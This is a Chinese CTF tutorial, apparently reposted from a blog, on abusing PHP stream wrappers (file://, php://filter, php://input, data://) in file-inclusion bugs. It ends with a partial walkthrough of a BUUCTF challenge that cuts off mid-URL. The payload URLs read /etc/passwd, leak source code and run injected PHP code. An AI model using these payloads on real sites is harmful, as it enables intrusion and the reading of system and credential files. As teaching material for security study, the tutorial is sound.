标签：password get web21 text flag echo 20210218CTF file php

CTF中常用的php伪协议利用

        </h1>
        <div class="clear"></div>
        <div class="postBody">

file://#

作用：

用于访问文件（绝对路径、相对路径、网络路径）

示例：

http://www.xx.com?file=file:///etc/passswd

php://#

作用：

访问输入输出流

1. php://filter

作用：

读取源代码并进行base64编码输出

示例：

http://127.0.0.1/cmd.php?cmd=php://filter/read=convert.base64-encode/resource=[文件名]（针对php文件需要base64编码）

参数：

resource=<要过滤的数据流> 这个参数是必须的。它指定了你要筛选过滤的数据流
read=<读链的筛选列表> 该参数可选。可以设定一个或多个过滤器名称，以管道符（|）分隔。
write=<写链的筛选列表> 该参数可选。可以设定一个或多个过滤器名称，以管道符（|）分隔。
<；两个链的筛选列表> 任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。

2. php://input

作用：

执行POST数据中的php代码

示例：

http://127.0.0.1/cmd.php?cmd=php://input

POST数据：<?php phpinfo()?>

注意：

enctype="multipart/form-data" 的时候 php://input 是无效的

data://#

作用：

自PHP>=5.2.0起，可以使用data://数据流封装器，以传递相应格式的数据。通常可以用来执行PHP代码。一般需要用到base64编码传输

示例：

http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

实例(https://buuoj.cn/challenges#[ZJCTF%202019]NiZhuanSiWei)#

打开网址，给了源码

  
   Copy
  <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

• 代码示意我们要get传参text，file，password
• 通过初步观察，可基本确定text要求传入文件，且文件内容为：welcome to the zjctf、file传入一个文件名，通过include($file)包含进来、password未知

伪协议第一次利用：
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))

这里需要我们传入一个文件且其内容为welcome to the zjctf,才可以进入判断进行下一步
由于：在官方手册中file_get_contents()是用来将文件的内容读入到一个字符串中的首选方法，并且给出了几个运用实例。

  
   Copy
  echo file_get_contents('http://www.xxx.com/aa.png', 'r');
// 将会在该页面中输出图片

在例子中发现：file_get_contents()的$filename参数不仅仅为本地文件路径，还可以是一个网络路径URL。于是便可以利用伪协议：

• 姿势一：data://协议利用

  
   Copy
  text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
// d2VsY29tZSB0byB0aGUgempjdGY= 解码后为 ----->  welcome to the zjctf

url：http://a7425027-7eb1-43be-a0c9-47a34018d60b.node3.buuoj.cn/?text=data

标签：password,get,web21,text,flag,echo,20210218CTF,file,php
来源： https://blog.csdn.net/qq_45290991/article/details/113852174

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。